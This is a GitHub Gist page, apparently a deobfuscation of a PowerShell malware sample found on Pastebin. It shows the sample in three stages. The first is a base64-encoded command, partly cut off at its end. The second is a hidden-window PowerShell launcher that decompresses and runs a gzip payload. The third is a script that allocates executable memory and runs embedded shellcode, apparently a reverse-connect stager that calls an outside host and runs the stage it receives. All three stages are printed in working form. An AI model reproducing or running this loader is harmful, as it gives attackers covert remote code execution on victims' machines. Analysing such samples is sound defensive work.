Created
January 24, 2019 21:55
-
-
Save ben0/849c6ab42106652d6ae6049600df6523 to your computer and use it in GitHub Desktop.
Pastebin PoSH crap
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEASAAvAEoASgBGAHcAQwBBADcAVgBXACsAMgAvAGIATgBoAEQAKwBPAFEAWAA2AFAAdwBpAEYAQQBVAG0ASQBZADEAbQBKADIANwBRAEIAQwBvAHoAeQAyADcAVQBTAE8ANABwAGYAOABZAHkAQgBsAGkAaQBaAE0AUwBVADYARgBPAFYAWAAxAC8AOQA5AEoAMQB0AHEAMAB5AFgAZAAyAGcARQBUAC8AQwBDAFAAZAArAFQAZABkADkAOABkADUAUwBlAFIASwB5AG0AUABGAE0AYQBXAFQAZQBYAHoANgAxAGMAbgBQAFMAeAB3AHEARwBpAEYANQBiADYAbwBGAEYAeQArADYAZQBvAG4ASgB5AEEAdQBzAEsANwB5AFUAZABHAG0AYQBMAFcAcQA4AFIARABUAGEASABaADEAVgBVADIARQBJAEoARQA4AHoAawB0AE4ASQBsAEUAYwBrADMARABPAEsASQBrADEAWABmAGwAVABHAFMAMgBJAEkARwBjADMAOAB3AGYAaQBTAHUAVwB6AFUAdgBpAGoAMQBHAFIAOABqAGwAbQBtAHQAcQB0AGkAZAAwAEcAVQBNAHgAUgA1ADYAVgBxAFgAdQB6AGgAMQBwAGUAUwBzAEcASgBXAGEAKwB2AHYAdgBxAGoANAA5AE0AMgBlAGwAKwBtAE8AQwBXAGEAeQBwAHoAaQA2AFcASgBDAHgANQBqAEsAbQA2ADgAawBWAFAARAA3AHoAYgByAFkAaQBtADIAdABRAFYAUABPAGEAKwBMAEkAMQBvAGQASABGAGUARwBrAFEAeAA5AHMAawAxADcATABZAG0ATgBwAEUATAA3AHMAVwBxAEQAagBIAEEAUgB4AEMAWgBpAEUAaQBCAGEARgBMAHoANAA2AEsAbQB3AHIAQQBuAHUASQBzADgAVAA1AEEAWQBkAEUAdgB0AGEATQAyAFgAUgBDAHQARQBDAFcATgBGADUAVABkAHQAbQBwADEAOQBtADAAUwBTAGgAZwBUAFcASgBSAEYAOAA1AFIAQwB4AHAAaQA2AEoAUwB5ADAAYwBlAFkAegBjAEUAbgArAG0AWABaAE4ATgBIAHYATABQAEcAbQBsAFAAagBVAEMAcgBKADQAVgBlAGgAQgBRADgAYwA5AEwAbQBYAHMATABJADAAVQA3AFYAbgA3AHMASgBTAGQAUABoAHkAUgBNAEgATQBYADkANQAvAGUAcgAxAEsAegA5AFAAOABzAFkAMgA1ADAAKwBUAEQASwBPAFQANgBXAEYATQB3AEQAVwB0AHgAMgBOADYAMABQAHUAbwBsAEkAdQBLAEQAYwBkAGcAeQBjAFUATwBwAG8AVQA3AGsAUgBCADkAcABrAHgAVAB3AEsAZQB6AG0AVgBJAFEAbAA2AGoANABZADMATQB6ADEAdwBYAE4AOQBZAHAANABJAEoAbwBPAE8AZgBWAG0AWQBKAEoAbABvAGkARAA3AEUAVQByAGwAUAAyAFoAVQBqAGYAZwAwAEkAcgBWAGQAaABFAFAAcQA1AHEAVABSAFgAawBLAFkAKwBJAHcAYwBRAGkAegBsAGEAdABmAGcAbABLAFoAbQBDADgAUwByAEUAVQBZAEMATABGAFAAVQBpAHMAcgAwAHUAVgBrADkAcABQAEsAcgByAFoAVgBRADUAaABHAEIAWABNAGgAUwBEAEYANQBCAEEAdgBYAHYAbgBUAGsAbQBRAGwAUABiAGsAVQAxAEMAZwBPAGcANABWAHcARgA0AEgANgBoAEsAYwB1ADIATQBuAHIAdgA4ADkASABRAE8AUwBtAHEAVgA0AFQAZwB1AEsAcgAwAEUAYQBzAFUAdABLAGcANwBCAGoASABoAEYAQgBVAFUAeAB6AFoAWgBRAEkAdgBsAGgAcQBIADUAegAxADAANgBZAHAAQwA2AE8AWgBiADcAZABUAE0AOQB4AHoATQA2AHIAOABpAGkAVwBJAG4ARQBoAGEAeABEADcAbgBiAE0AaQBMAHMAVQBzAGgAYQBLAG8AdABLAGgASAByAEoAMQBEAGcALwB4AGMAOQBVAFUAZwBxAHAAZwB4AEcAZwBXAHcAMAB4AG8AUwBBAFoASQBVAEEARQBlAG0AWABCAEQAZwBZAHAAcAAzAHYAZQBRAFEAMgBRADUAWABqAEkAUwBnAGMAcQBqAFoAQgBzAE0AQgBWAEcAagBHADkAQQBOADMAYwBFAEEAOAA5AGUAOABPADUAbAB3ACsARQBqAGUARgBJAHMAZgBnAGkAWAB1AFEAWAA0AGQAeABXAFYAUwBHAFYARQBnAG8ALwBSAFQAVwBsAEUAVAAvADYAZgBRAG4ATgBYAC8AdwBvAHkAcABJAGwAZwBnAHQATAA0ACsAcAB0AFoATQBwAHEAUQB2AEwAbABwAGsAUwBNAGcAUABsAEEASQBHAFEARQBIADUARAA4AE4ARABDAE0AWABsAFgAYwBhAFEAQQBjAEwAUQAzAHgAZwAyAHQASQBuAGcAbQA3AFkAagBaAHIAcgBXAGsASgB0AHAAUQBzADIAMwBEAGQAMABBAHYAMgByAHgAMgA2AFgAMwBxAFAATABRAE0AVQBkAHMAdQBmAE4AUwBPADIAMwBhAHIAVgArAHUAMwBXAHAAVgAxAHgAeABsAFcAcABGAE4AdgB5ADAAKwA5AHQAcgBUAHIANAA0AGMASABCADcAVgB1AEIAeABOADUAMwAwAGEAdABPADEAcABlAFQAaQByADcAVgBZAGYAdQBuAFMANwB5AEoAbAB2AGoAMwBkADcAYQBiADgAcgBXAGQAdgA4AFEAZQBQADYAawA1AHYAdgBCAHAAZQAvAGMAbQBtADgAYgB0AEQAdQBxADkAcQAzAHkATwBlADcAVwA2AGsAbAAzAFoARwAyAHMAYwBpAFcAdQAwADAAMgByAFQAdwBmADkAWgBhAGMAaAA1ADUATQBoAHcAdwBQAGYAQwBNAGIAbQBCADAAeQAzAFgAZgBFAHcATgBMAG0AOQBiAHkAUABVAFgARgB5ADQAKwA0ADQALwBiAEMANQBzAGIAegBkAHAAVQBmAEoAZwBsAEwAdQAwAGoALwBvAEkAZgBYAEoAdgBCADQATgBtAHMAQQBxAGEATQBUAEkAKwBEAEIAKwByAEkAWQAwAGIAaQBGAGMAeABhAHEAUAA2ADgARgAzAG4ATABiAFAANgBnADQAYQBGAEIAbgBXAHIAagAyADkANAA3ACsASwAwAFoAcABqADMAMwBtAE8AOQBjAFQALwBHAG4AWgBCADUAegBaAFoAaABUAHMAYgBJAFEAOABLADQAQwB4AGIAbQA1AGMAMABpAFMAbgBIAEMAZwBmAFYAbwBwAFQAcQBvAGUANwA5AHIARwBLAEQAVABxADYAQgBXADUAWgB6AHUANwB4AC8ANwB6AFEARABWAFEAVwBjAFkAYwBvAFEAYgBkAEQAawA0AEgAYwBPAGUAMQAzAGQAZwBNAHgAcQBZAEgAawBjAHkAYQBvADgATgBZAHgAZwBZAEEAZgBLAGQAeABRAFEAagBDADcAUwB0AFIAOQBTAHcAZQBIAFgAMwB2AG0AZgAzAGoATwBIAHcAZgBHAEgATwBsACsAWQBDAGYAQwBiAGoAOQBYAHUANwBnADAANABiAGIAcwA4AHcAagBOAE4AdwBEAHIAOABHAGMAdQAzAFYATgBoAHAAYgBtADgAdgAxAFIAdQBMAE8AQwBQAGEAKwBNAHoANABNAFAAcgA1AEoASwBRAEkAYwBLAGYAQwBiACsAbgByADcASgBQAGsALwA2AHQAawAyAEYAdgBFAEMATQB5AEEARgB0AE8ATwA4AEQAaAB0AGMATgBMAEkAVwAyACsATQAwAHQAZABDADAAdwAzADIANgBKAEMASQBpAEQARwA0AGsAdQBMAE4AeQBOAGkAUABHAHUASgB1ADIAOQAwAE0AegBoAHEAdgBsADIAUABCAG4AVQBJADAARABHAEYANgBjAHYAegBqAFMAbABhACsASwArAHIAZgBHAG4ANAB1AHUAcgB1ADcAQgBTADYAZwBQAFkASABDAHAAUwA2AEoAQQBMAG8AcgBsADcAVQBXADUARABHADIAOAB2AEsAMgBVAEkAYwBxAGYARAA2AHoASwBWAHoAcwB0ADMAYQBtAFkAMwBnAEoASABaAEwASwB0ADIAVwBGAHIAUABTADIAYQBnAHEAagA5AHYAMwBCAGwAaABiAHEAQQBQACsALwBmADQAUABvAG0AKwA0AGYAVgBuADQASwB3AFgATQB3AEMAZgBpAGIALwBYAHYAQgBMAGkAUAA1AHkANwBDAE4ATQBKAFcAZwA2ADAARwBzAFkATwBWADUAMQBMADAATwBRAGsAZQBQAEoAcQA0AEMAbwBRAGUAYgA5ADcARQBsAGYAdwBtADQAUwBlAFgAWQBOADcAdwBkAC8AQQBmAFIAUgBuAGgAdgBxAEMAUQBBAEEAJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQmsf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAH/JJFwCA7VW+2/bNhD+OQX6PwiFAUmIY1mJ27QBCozy27USO4pf8YyBliiZMSU6FOVX1/99J1tq0yXd2gET/CCPd+Tdd98d5SeRKymPFMaWTeXz61cnPSxwqGiF5b6oFFy+6eonJyAusK7yUdGmaLWq8RDTaHZ1VU2EIJE8zktNIlEck3DOKIk1XflTGS2IIGc38wfiSuWzUvij1GR8jlmmtqtid0GUMxR56VqXuzh1peSsGJWa+vvvqj49M2el+mOCWaypzi6WJCx5jKm68kVPD7zbrYim2tQVPOa+LI1odHFeGkQx9sk17LYmNpEL7sWqDjHARxCZiEiBaFLz46KmwrAnuIs8T5AYdEvtaM2XRCtECWNF5Tdtmp19m0SShgTWJRF85RCxpi6JSy0ceYzcEn+mXZNNHvLPGmlPjUCrJ4VehBQ8c9LmXsLI0U7Vn7sJSdPhyRMHMX95/er1Kz9P8sY250+TDKOT6WFMwDWtx2N60PuolIuKDcdgycUOpoU7kRB9pkxTwKezmVIQl6j4Y3Mz1wXN9Yp4IJoOOfVmYJJloiD7EUrlP2ZUjfg0IrVdhEPq5qTRXkKY+IwcQizlatfglKZmC8SrEUYCLFPUisr0uVk9pPKrrZVQ5hGBXMhSDF5BAvXvnTkmQlPbkU1CgOg4VwF4H6hKcu2Mnrv89HQOSmqV4TguKr0EasUtKg7BjHhFBUUxzZZQIvlhqH5z106YpC6OZb7dTM9xzM6r8iiWInEhaxD7nbMiLsUshaKotKhHrJ1Dg/xc9UUgqpgxGgWw0xoSAZIUAEemXBDgYpp3veQQ2Q5XjISgcqjZBsMBVGjG9AN3cEA89e8O5lw+EjeFIsfgiXuQX4dxWVSGVEgo/RTWlET/6fQnNX/woypIlggtL4+ptZMpqQvLlpkSMgPlAIGQEH5D8NDCMXlXcaQAcLQ3xg2tIngm7YjZrrWkJtpQs23Dd0Av2rx26X3qPLQMUdsufNSO23arV+u3WpV1xxlWpFNvy0+9trTr44cHB7VuBxN530atO1peTir7VYfunS7yJlvj3d7ab8rWdv8QeP6k5vvBpe/cmm8btDuq9q3yOe7W6kl3ZG2sciWu002rTwf9Zach55MhwwPfCMbmB0y3XfEwNLm9byPUXFy4+44/bC5sbzdpUfJglLu0j/oIfXJvB4NmsAqaMTI+DB+rIY0biFcxaqP68F3nLbP6g4aFBnWrj2947+K0Zpj33mO9cT/GnZB5zZZhTsbIQ8K4Cxbm5c0iSnHCgfVopTqoe79rGKDTq6BW5Zzu7x/7zQDVQWcYcoQbdDk4HcOe13dgMxqYHkcyao8NYxgYAfKdxQQjC7StR9SweHX3vmf3jOHwfGHOl+YCfCbj9Xu7g04bbs8wjNNwDr8Gcu3VNhpbm8v1RuLOCPa+Mz4MPr5JKQIcKfCb+nr7JPk/6tk2FvECMyAFtOO8DhtcNLIW2+M0tdC0w326JCIiDG4kuLNyNiPGuJu290Mzhqvl2PBnUI0DGF6cvzjSla+K+rfGn4uuru7BS6gPYHCpS6JALorl7UW5DG28vK2UIcqfD6zKVzst3amY3gJHZLKt2WFrPS2agqj9v3BlhbqAP+/f4Pom+4fVn4KwXMwCfib/XvBLiP5y7CNMJWg60GsYOV51L0OQkePJq4CoQeb97Elfwm4SeXYN7wd/AfRRnhvqCQAA''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::St&± |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function llkG { | |
Param ($kz, $cowL) | |
$lL = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
return $lL.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lL.GetMethod('GetModuleHandle')).Invoke($null, @($kz)))), $cowL)) | |
} | |
function wM1b { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $r7A, | |
[Parameter(Position = 1)] [Type] $vped = [Void] | |
) | |
$tQnA = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
$tQnA.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $r7A).SetImplementationFlags('Runtime, Managed') | |
$tQnA.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $vped, $r7A).SetImplementationFlags('Runtime, Managed') | |
return $tQnA.CreateType() | |
} | |
[Byte[]]$kH1 = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmisFAoCaAIAEV6J5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U=") | |
$oOEvx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll VirtualAlloc), (wM1b @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $kH1.Length,0x3000, 0x40) | |
[System.Runtime.InteropServices.Marshal]::Copy($kH1, 0, $oOEvx, $kH1.length) | |
$rD = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll CreateThread), (wM1b @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$oOEvx,[IntPtr]::Zero,0,[IntPtr]::Zero) | |
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll WaitForSingleObject), (wM1b @([IntPtr], [Int32]))).Invoke($rD,0xffffffff) | Out-Null |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment